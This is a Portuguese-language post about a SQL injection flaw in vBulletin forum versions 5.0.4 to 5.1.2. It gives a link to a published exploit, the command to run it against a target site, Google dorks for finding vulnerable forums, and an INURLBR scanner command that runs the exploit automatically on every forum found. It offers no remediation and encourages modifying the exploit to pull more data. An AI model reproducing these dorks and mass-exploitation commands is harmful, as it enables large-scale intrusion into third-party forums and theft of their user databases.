vBulletin é um software desenvolvido por vBulletin Solutions, para a criação e manutenção de fóruns na Internet. Ele é baseado em PHP e MySQL e segundo a empresa mais de 100.000 sites funcionam sob este sistema.
Segundo vBulletin que confirma o problema afeta as versões 5.0.4, 5.0.5, 5.1.0, 5.1.1 e 5.1.2. O grupo romeno Romanian Security Team (RST) postou um vídeo que mostra a vulnerabilidade e confirma o relatório para vBulletin, que irá fornecer todos os detalhes após o lançamento do patch.
A vulnerabilidade permite que um atacante realize ataques de injeção SQL no banco de dados, com todas as implicações que isso pode trazer. Ou seja, extrair todas as informações e conteúdo do banco de dados, e até mesmo de lá comprometer todo o sistema.
Tal façanha foi publicado e nos permite obter a versão, nome de usuário e banco de dados para obter detalhes mais suculentos deve modificar o exploit:
Vídeo demostrativo=>
Usando exploit=> http://pastebin.com/hb2adMn6
php exploit.php {target}
Ex: php exploit.php http://forum.teste.com.br
DORK[0]=> "Powered by vBulletin® Version 5.1.2"
DORK[1]=> "Powered by vBulletin® Version 5.0.4"
DORK[2]=> "Powered by vBulletin® Version 5.0.5"
DORK[3]=> "Powered by vBulletin® Version 5.1.0"
DORK[4]=> "Powered by vBulletin® Version 5.1.1"
DORK[5]=> site:com intext:"5.0.4" & "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org
Com base no exploit feito pela Romanian Security Team fizemos o nosso voltado para o ferramenta INURLBR, tal exploit será disponibilizado junto com próxima versão do scanner, mas nada impede de usar com o scan script feito pela (RST).
Comando INURLBR=>
./inurlbr.php --dork 'site:com intext:"5.0.4" "Powered by vBulletin" inurl:"/forum/" -site:vbulletin.com -site:vbulletin.org -site:forumrunner.com' -s vBulletin.txt -q 6 -t 1 --comand-all 'php exploitvBulltin.php http://_TARGET_'
Demostrativo=>
Fontes=>{
[+] http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html[+] http://unaaldia.hispasec.com/2014/07/inyeccion-sql-en-el-gestor-de-foros.html
[+] http://packetstormsecurity.com/files/127537/vBulletin-5.1.2-SQL-Injection.html
[+] http://1337day.com/exploits/22452